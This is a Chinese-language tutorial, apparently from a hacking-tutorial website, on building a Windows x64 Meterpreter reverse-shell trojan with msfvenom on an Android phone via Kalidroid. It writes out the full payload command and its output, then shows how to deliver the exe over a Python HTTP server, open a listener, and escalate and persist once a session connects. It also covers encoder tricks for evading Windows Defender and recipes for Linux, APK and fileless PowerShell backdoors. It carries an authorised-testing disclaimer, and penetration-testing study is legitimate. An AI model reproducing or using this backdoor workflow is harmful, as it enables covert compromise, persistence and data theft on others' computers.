前言
msfvenom 是 Metasploit 框架内置的载荷生成工具,传统需要电脑 Kali 操作,而 Kalidroid 将其封装为全图形化界面,无需记忆冗长命令,安卓手机就能生成 Windows、Linux、Android、脚本类反弹 Shell 后门程序。
本文基于真机 ( 华为p90,Kalidroid v1.3.29-debug)全套实操截图,完整演示Windows x64 反弹 Meterpreter exe 载荷生成 + 内网 Python HTTP 服务分发木马全流程,所有操作仅限拥有书面合法授权的测试环境使用。
一、msfvenom 模块入口与模式介绍
1. 进入 msfvenom 模块
打开 Kalidroid 主界面,找到 Metasploit 功能入口进入,顶部 MODE 栏包含 4 种运行模式,本次实操选择红色高亮的 msfvenom 模式。

模式说明:
- msfconsole:交互式漏洞攻击控制台(上一篇教程内容)
- msfvenom:一次性生成各类系统反弹载荷后门(本文核心)
- Handler:独立监听端口,等待木马反弹连接
- msfrpcd:MSF 远程 RPC 服务,用于自动化脚本联动
页面提示:msfvenom 仅单次生成 payload 文件,不会持续开启监听会话,生成后门后需要单独开启 Handler/msfconsole 监听端口。
2. 内置全平台载荷分类
软件图形化封装主流系统载荷,覆盖渗透测试全部场景:
- Windows 平台
- meterpreter (win x64):64 位 Windows 交互式反弹 Shell(本次选用)
- meterpreter (win x86):32 位 Windows 系统专用
- shell (win x64):基础 cmd 无功能反弹 shell
- Linux 平台
- meterpreter (linux x64/arm64):服务器、ARM 设备专用载荷
- Android 平台
- meterpreter (android):APK 安卓木马
- Web 脚本载荷
python/php reverse_tcp、powershell、bash 等网页 / 脚本后门
本次实操选择:
meterpreter (win x64) windows · staged,自动填充载荷字符串:windows/x64/meterpreter/reverse_tcp。
二、载荷核心参数可视化配置详解
1. 监听器 LHOST & LPORT(木马回连地址)
- LHOST:手机局域网 IP
192.168.10.6,目标运行木马后会主动连接这个地址 - LPORT:监听端口,标准默认 4444(可自定义 5000、8080 等未占用端口)
提示区分内网 / 外网:
内网测试填写手机局域网 IP;外网公网测试需要填写公网 IP,并在路由器做端口转发映射 LPORT 端口。
2. OUTPUT FORMAT 输出格式(关键)
软件内置几十种文件输出格式,对应不同操作系统:
| 格式 | 适用系统 | 用途 |
|---|---|---|
| exe | Windows | 可直接双击运行的 Windows 可执行程序(本次选用) |
| elf / elf-so | Linux | Linux 二进制程序、动态链接库 |
| apk | Android | 安卓安装包木马 |
| dll | Windows | 动态链接库注入后门 |
| psh / psh-net | Windows | Powershell 内存执行脚本 |
| python/php/bash | Web / 服务器 | 一句话反弹脚本 |

本次实操选择
exe 格式,生成 Windows 可执行木马文件。3. 输出文件路径
默认生成路径
/root/payload.bin,切换 exe 格式后自动重命名为 payload.exe,文件保存在 Kalidroid 虚拟机根目录,后续可通过 HTTP 服务下载。4. 编码器(免杀基础混淆)
编码器用于混淆载荷特征,降低杀毒软件查杀概率:
- (none):无编码,原生载荷,杀毒极易拦截(本次测试选用)
- shikata_ga_nai:多态变形编码器,最常用免杀混淆
- x64/xor、powershell_base64:对应架构 / 脚本专用编码
进阶场景可勾选 shikata_ga_nai 提升免杀效果,新手学习可先选择 none。
5. 自定义高级参数
输入框可补充 msfvenom 原生参数,示例本次配置:
--platform linux · -b '\x00'
--platform linux:指定目标系统平台-b '\x00':剔除载荷中的空字节,避免程序运行报错
6. 全局启动设置开关
- 自动初始化 msfdb:生成载荷无需数据库,可关闭节省内存
- 安静横幅:跳过 MSF 启动大段 ASCII 字符画,界面更简洁
- ANSI 颜色:开启终端彩色日志,区分成功 / 报错信息

三、一键生成 Windows 反弹木马完整流程
步骤 1:参数汇总核对
- 载荷:windows/x64/meterpreter/reverse_tcp
- LHOST:192.168.10.6
- LPORT:4444
- 输出格式:exe
- 编码器:none
- 自定义参数:–platform linux -b ‘\x00’
步骤 2:执行生成
确认全部参数后,点击底部蓝色 生成有效载荷 按钮,软件自动拼接完整 msfvenom 命令执行:
msfvenom -p 'windows/x64/meterpreter/reverse_tcp' LHOST=192.168.10.6 LPORT=4444 -f exe -o /root/payload.exe --platform linux -b '\x00'

步骤 3:生成结果日志解读
[-] No platform was selected, choosing Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 509 bytes
Final size of exe file: 7680 bytes
Saved as: /root/payload.exe

日志关键信息:
- 自动识别目标系统 Windows x64 架构
- 未使用编码器,原生载荷 509 字节,打包 exe 后总大小 7.6KB
- 文件成功保存至虚拟机根目录
/root/payload.exe
四、内网 HTTP 服务分发木马(让 Windows 主机下载后门)
木马生成后需要传输到目标 Windows 设备,本文演示手机内置 Python3 简易 HTTP 服务器分发方案。
1. 开启端口转发(虚拟机端口映射)
进入 Kalidroid 全局设置→网络页面,添加端口转发规则:
8080 → 8080 (tcp)

作用:将虚拟机内部 8080 端口映射到手机局域网,内网其他设备可通过手机 IP 访问虚拟机内的文件服务。
2. 终端启动 Python 文件服务
打开 Kalidroid 内置 Terminal 终端,执行两条命令:
ls查看根目录文件,确认payload.exe存在python3 -m http.server 8080启动成功提示:
Serving HTTP on 0.0.0.0 port 8080

3. Windows 浏览器下载木马
在同一局域网 Windows 电脑打开浏览器,访问地址:
http://192.168.10.6:8080
页面列出虚拟机根目录全部文件,找到 payload.exe 点击,弹出下载弹窗,确认保存到 Windows 本地。
五、木马上线前置:开启 MSF 监听
木马下载到目标 Windows 主机后,必须提前在 Kalidroid 开启监听,否则木马运行后无法回连获取会话,两种监听方案:
- Handler 模式:仅开启端口监听,轻量化占用内存
- msfconsole 模式:完整交互式控制台,推荐新手使用
监听核心参数和生成木马保持一致:LHOST=192.168.10.6,LPORT=4444,载荷选择 windows/x64/meterpreter/reverse_tcp。


上线后可执行操作
目标双击运行 payload.exe 后,手机 MSF 会收到 Meterpreter 会话,可完成:
- sysinfo:查看 Windows 系统版本、硬件信息
- getsystem:提升至系统最高管理员权限
- upload/download:双向上传下载主机文件
- screenshot:实时截取目标电脑屏幕
- persist 模块:写入注册表实现开机自启持久化后门
六、多场景载荷生成方案(按需选用)
方案 1:Windows 免杀基础后门
- 载荷:win x64 meterpreter
- 输出格式:exe
- 编码器:shikata_ga_nai
- 适用:内网无杀毒测试环境
方案 2:Linux 服务器后门
- 载荷:linux x64 meterpreter
- 输出格式:elf
- LPORT:4444
- 分发:Python HTTP 服务传输 elf 文件,chmod 赋予执行权限
方案 3:安卓 APK 木马
- 载荷:meterpreter (android)
- 输出格式:apk
- 分发:浏览器下载 APK 安装至测试安卓设备
方案 4:Powershell 无文件内存后门
- 输出格式:psh-net
- 无需生成 exe 文件,复制脚本直接在 Windows 终端执行,不留本地文件痕迹
七、常见报错与排错指南
| 故障现象 | 原因 | 解决办法 |
|---|---|---|
| 生成载荷命令执行失败 | 自定义参数语法错误 | 清空自定义参数输入框,使用图形按钮配置 |
| Windows 下载页面无法访问 | 未开启端口转发;防火墙拦截 8080 端口 | 全局设置添加 8080 端口转发;关闭手机 / 电脑防火墙 |
| 木马双击运行无会话上线 | LHOST/LPORT 填写错误;监听未提前开启;目标防火墙拦截 4444 端口 | 核对手机局域网 IP;提前打开 Handler 监听;放行目标出站 4444 端口 |
| exe 木马直接被 Windows Defender 删除 | 未使用编码器混淆载荷特征 | 切换 shikata_ga_nai 编码器,多次编码提升免杀 |
| 终端执行 python3 提示命令不存在 | 未预装 Python3 环境 | 终端执行apt update && apt install python3安装依赖 |
八、法律合规重要警示
- 本教程仅用于企业内部安全自查、授权渗透测试、网络安全专业学习,严禁对未授权设备、服务器、个人电脑生成、传播、运行后门程序,私自制作木马入侵他人设备触犯《网络安全法》《刑法》,需承担刑事责任。
- 测试结束后,立即删除所有生成的 payload 后门文件,关闭监听端口、HTTP 文件服务,清除所有测试日志,消除安全痕迹。
- 禁止将生成的后门程序传播、分享给第三方,禁止用于牟利、窃取数据、破坏系统等恶意行为。
教程完整流程总结
- 打开 Kalidroid Metasploit 模块,切换 msfvenom 载荷生成模式;
- 选择对应系统架构载荷,填写手机回连 IP(LHOST)、监听端口(LPORT);
- 选择输出文件格式(exe/elf/apk 等),按需添加编码器混淆;
- 一键生成后门程序,文件自动保存至虚拟机根目录;
- 全局设置添加端口转发,终端启动 Python HTTP 服务,内网设备浏览器下载木马;
- 切换 msfconsole/Handler 开启对应端口监听;
- 授权测试设备运行木马,等待 Meterpreter 会话上线完成渗透。
系列教程回顾
- Kalidroid Nmap 内网端口扫描实战
- Kalidroid SubFinder 子域名资产挖掘
- Kalidroid MSFconsole 漏洞利用(BlueKeep 案例)
- 本篇:Kalidroid msfvenom 后门载荷生成与内网分发
© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7.本站原创内容版权归 X黑手网 及对应作者共同所有,欢迎转载,转载请务必注明原文出处及作者信息。
2、本站永久网址:https://xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
7.本站原创内容版权归 X黑手网 及对应作者共同所有,欢迎转载,转载请务必注明原文出处及作者信息。
THE END









暂无评论内容